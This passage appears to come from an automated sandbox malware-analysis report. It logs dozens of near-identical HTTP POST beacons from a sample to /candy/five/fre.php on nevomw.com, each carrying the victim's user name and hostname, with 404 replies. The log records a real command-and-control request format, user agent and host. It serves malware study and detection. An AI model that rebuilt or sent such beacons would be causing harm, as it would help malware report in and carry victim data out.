                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:00.965354919 CET1564INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:00 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            171192.168.2.64991945.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:54:01.222614050 CET1564OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:01.275552988 CET1565OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:01.355035067 CET1565INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:01 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            172192.168.2.64992045.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:54:01.607789993 CET1566OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:01.660707951 CET1566OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:01.748774052 CET1567INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:01 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            173192.168.2.64992145.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:54:02.042783022 CET1567OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:02.099517107 CET1568OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:02.174634933 CET1568INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:02 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            174192.168.2.64992245.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:54:02.488890886 CET1569OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:02.541819096 CET1569OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:02.615942001 CET1569INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:02 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            175192.168.2.64992345.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:54:02.873127937 CET1571OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:03.024460077 CET1571OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:03.102365971 CET1572INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:03 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            176192.168.2.64992445.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:54:03.408857107 CET1573OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:03.460256100 CET1573OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:03.534225941 CET1574INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:03 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            177192.168.2.64992545.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:54:03.821188927 CET1574OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:03.874212980 CET1575OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:03.950833082 CET1575INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:03 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            178192.168.2.64992645.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:54:04.227868080 CET1576OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:04.281078100 CET1576OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:04.356916904 CET1577INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:04 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            179192.168.2.64992745.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:54:04.684159994 CET1577OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:04.737780094 CET1578OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:04.824449062 CET1578INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:04 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            18192.168.2.64973145.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:52:50.629810095 CET96OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:52:50.681869030 CET97OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:52:50.756248951 CET97INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:52:50 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            180192.168.2.64992845.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:54:05.082818985 CET1579OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:05.144393921 CET1579OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:05.223505020 CET1579INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:05 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            181192.168.2.64992945.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:54:05.706168890 CET1580OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:05.764142036 CET1581OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:05.846091032 CET1581INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:05 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            182192.168.2.64993045.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:54:06.116519928 CET1582OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:06.182387114 CET1582OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:06.257916927 CET1582INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:06 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            183192.168.2.64993145.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:54:06.510435104 CET1583OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:06.562309027 CET1584OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:06.636279106 CET1584INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:06 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            184192.168.2.64993245.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:54:06.913352013 CET1585OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:06.966228962 CET1585OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:07.043773890 CET1585INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:07 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            185192.168.2.64993345.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:54:07.374504089 CET1586OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:07.433208942 CET1586OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:07.512545109 CET1587INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:07 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            186192.168.2.64993445.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:54:07.745647907 CET1588OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:07.797575951 CET1588OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:07.870342016 CET1588INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:07 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            187192.168.2.64993545.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:54:08.120275021 CET1589OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:08.175287008 CET1589OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:08.249250889 CET1590INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:08 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            188192.168.2.64993645.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:54:08.508028030 CET1591OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
